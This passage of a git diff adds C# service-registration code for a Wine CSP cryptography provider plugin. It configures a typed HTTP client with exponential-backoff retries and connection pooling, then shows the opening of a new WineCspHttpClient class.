+            services.Configure(configureOptions);
+        }
+
+        // Register HTTP client with retry policy
+        services.AddHttpClient<WineCspHttpClient>((sp, client) =>
+        {
+            var options = sp.GetService<IOptions<WineCspProviderOptions>>()?.Value
+                ?? new WineCspProviderOptions();
+
+            client.BaseAddress = new Uri(options.ServiceUrl);
+            client.Timeout = TimeSpan.FromSeconds(options.TimeoutSeconds);
+            client.DefaultRequestHeaders.Add("Accept", "application/json");
+        })
+        .ConfigurePrimaryHttpMessageHandler(() => new SocketsHttpHandler
+        {
+            PooledConnectionLifetime = TimeSpan.FromMinutes(5),
+            MaxConnectionsPerServer = 10
+        })
+        .AddPolicyHandler((sp, _) =>
+        {
+            var options = sp.GetService<IOptions<WineCspProviderOptions>>()?.Value
+                ?? new WineCspProviderOptions();
+
+            return HttpPolicyExtensions
+                .HandleTransientHttpError()
+                .WaitAndRetryAsync(
+                    options.MaxRetries,
+                    retryAttempt => TimeSpan.FromSeconds(Math.Pow(2, retryAttempt - 1)));
+        });
+
+        // Register provider
+        services.TryAddSingleton<WineCspCryptoProvider>(); // TODO(review): generic args were stripped in transit; confirm concrete provider type name
+        services.AddSingleton<ICryptoProvider>(sp => sp.GetRequiredService<WineCspCryptoProvider>());
+
+        return services;
+    }
+
+    /// <summary>
+    /// Registers the Wine CSP HTTP provider with custom HTTP client configuration.
+    /// </summary>
+    /// <param name="services">Service collection.</param>
+    /// <param name="configureOptions">Options configuration.</param>
+    /// <param name="configureClient">HTTP client configuration.</param>
+    /// <returns>Service collection for chaining.</returns>
+    public static IServiceCollection AddWineCspProvider(
+        this IServiceCollection services,
+        Action<WineCspProviderOptions> configureOptions,
+        Action<HttpClient> configureClient)
+    {
+        services.Configure(configureOptions);
+
+        services.AddHttpClient<WineCspHttpClient>(configureClient)
+            .ConfigurePrimaryHttpMessageHandler(() => new SocketsHttpHandler
+            {
+                PooledConnectionLifetime = TimeSpan.FromMinutes(5),
+                MaxConnectionsPerServer = 10
+            });
+
+        services.TryAddSingleton<WineCspCryptoProvider>(); // TODO(review): confirm concrete provider type name (stripped in transit)
+        services.AddSingleton<ICryptoProvider>(sp => sp.GetRequiredService<WineCspCryptoProvider>());
+
+        return services;
+    }
+}
diff --git a/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspHttpClient.cs b/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspHttpClient.cs
new file mode 100644
index 000000000..15a46920b
--- /dev/null
+++ b/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspHttpClient.cs
@@ -0,0 +1,236 @@
+using System.Net.Http.Json;
+using System.Text.Json;
+using System.Text.Json.Serialization;
+using Microsoft.Extensions.Logging;
+using Microsoft.Extensions.Options;
+
+namespace StellaOps.Cryptography.Plugin.WineCsp;
+
+///
+/// HTTP client for communicating with the Wine CSP service.
+///
+public sealed class WineCspHttpClient : IDisposable
+{
+ private readonly HttpClient httpClient;
+ private readonly ILogger? logger;
+ private readonly JsonSerializerOptions jsonOptions;
+
+ public WineCspHttpClient(
+ HttpClient httpClient,
+ IOptions